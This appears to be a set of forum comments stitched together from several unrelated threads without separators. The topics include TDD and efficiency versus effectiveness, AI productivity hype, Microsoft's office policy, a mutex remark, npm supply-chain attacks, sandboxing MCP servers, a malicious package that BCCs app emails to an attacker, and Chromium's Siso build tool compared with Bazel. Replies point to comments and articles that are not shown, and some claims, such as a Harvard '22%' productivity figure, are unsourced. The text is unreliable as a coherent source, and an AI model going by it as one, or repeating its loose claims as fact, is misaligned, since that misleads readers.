Shortening feedback loops was what Kent Beck and TDD advocates were emphasizing. Now TDD has been ruined by "experts", people are realizing the importance of fast feedback loops from a different perspective.
But what most of them do is not to be more efficient but to be shown to be more efficient. The main reason they are so obsessed with AI is because they want to send the signal that they are pursuing to be more efficient, whether they succeed or not.
Peter Drucker popularized the phrase "Efficiency is doing things right; effectiveness is doing the right things."
Being a credibly efficient at doing the wrong things, turns out to be a massive issue inside of most companies. What's interesting is I do think that AI gives opportunity to be massively more effective because if you have the right LLM, that's trained right, you can explore a variety of scenarios much faster than what you can do by yourself. However, we hear very little about this as a central thrust of how to utilize AI into the work space.
In my experience plenty of places are quite inefficient at doing the wrong things as well. You might think this reduces the number of wrong things done, but somehow it doesn't.
It's almost comical isn't it, but it actually turns out that this is a big foundation behind behavioral economics. In essence you can get trapped in an upper level heuristic and never stop for a moment and thinks things through.
Another one of my favorite examples is that there is some research out of Harvard that basically suggested that if people would take and spend 15 minutes a day reviewing what they had done and what was important, they increased their productivity 22%. Now you would think that this is so obvious and so dramatic you would have variety of Fortune 500 companies saying "oh my goodness we want all of our workers to be 22% more productive" and so they would simply send out a memo or an email or some sort of process to force people to do some reflecting.
I would also suggest that Microsoft had a unique advantage based out of the idea that people should have their own enclosed workspace to do coding. This was deeply entrenched when Bill was running the company day-to-day. And I'm sure as somebody that was a coding phenomenon, it simply made sense to him. But academically, it also makes sense.
Microsoft has reversed this policy, but as far as I can tell, it doesn't have anything to do with the research. It has to do with statements about working together efficiently. or AI productivity. If there's real research then it's great.
My problem is it just doesn't appear to be any real research behind it. Yet I'm sure many managers at Microsoft thinks that it's very efficient. Of course, if you do know anybody at Microsoft that codes, they have their own opinion, and rather than me repeating hearsay, it would be fantastic to have somebody anonymously post what's really going on here. I'll betcha a nickel that 90% of them are not reporting that they feel a lot more effective.
That happens whether immutable or not. In the mutable world, you have to guard that using a mutex or something. In that case, operation 1 may be blocked by operation 2, and now you get a "stale" state from operation 2. But that's okay. You'll get a new state next time. The real problem occurs when two states are mixed and corrupted.
It's almost always npm packages. I know that's because npm is the most widely used package system and most motivating one for attackers. But still bad taste in my mouth.
Even OpenAI uses npm to distribute their Codex CLI tool, which is built in Rust. Which is absurd to me, but I guess the alternatives are less convenient.
This is why I don't run stdio MCP servers. All MCPs run on docker containers on a separate VM host on an untrusted VLAN and I connect to them via SSE.
Still vulnerable to prompt injection of course, but I don't connect LMs to my main browser profile, email, or cloud accounts either. Nothing sensitive.
If you used this package, you would still have been victim of this despite your setup. All your password reset or anything sent by your app BCC to the bad guy.
Here is hoping the above comment isn't upvoted to the point where it is portrayed as something like a "key takeaway" from the article. That would be missing the point.
Even so, a build system migration of any kind being anything other than Bazel given the design goals of Bazel and the heritage of Chrome is an implicit indictment of Bazel itself.
Most likely Chromium needs to build on a system which doesn’t support Java. Like ChromeOS. That excludes Bazel, at least unless cross-compilation is supported (likely a monstrous headache for ChromeOS). It’s a good reason to rewrite Bazel in Rust.
Yeah, thats fair, but if I understood right- this is a custom built tool to be compatible with Ninja.
That work building “yet another build tool” could have gone in to programmatically generating bazel BUILD files. So, there was an active choice here somewhere; we just don’t know all the information as to why effort was diverted away from Bazel and toward building a new tool.
I trust them to make good decisions, so I would like to understand more. :)
Seems like Siso supports Starlark, so maybe its a step in Bazels direction after all.
There is a ton of tools and custom logic used by/with/for the GN ecosystem in chromium that I imagine would be difficult to port.
This tool is substantially less complex than Bazel, nor is it a reimplementation of Bazel. Ninja's whole goal in life is to be a very fast local executor of the command DAG described by a ninja file, and siso's only goal is to be a remote executor of that DAG.
This is overall less complex than their first stabs at remote execution, which involved standing up a proxy server locally and wrapping all ninja commands in a "run a command locally which forwards it to the proxy server which forwards it to the remote backend" script.
It reminds me of how Blaze (which became Bazel) was designed to be mostly compatible with the build files of a previous build system written in Python.
Yes I’ve played with Gleam. A nice small language but bigger than I had in mind. That’s mainly to look under the covers, which in Gleam’s case involves other language platforms, so less interesting in this context.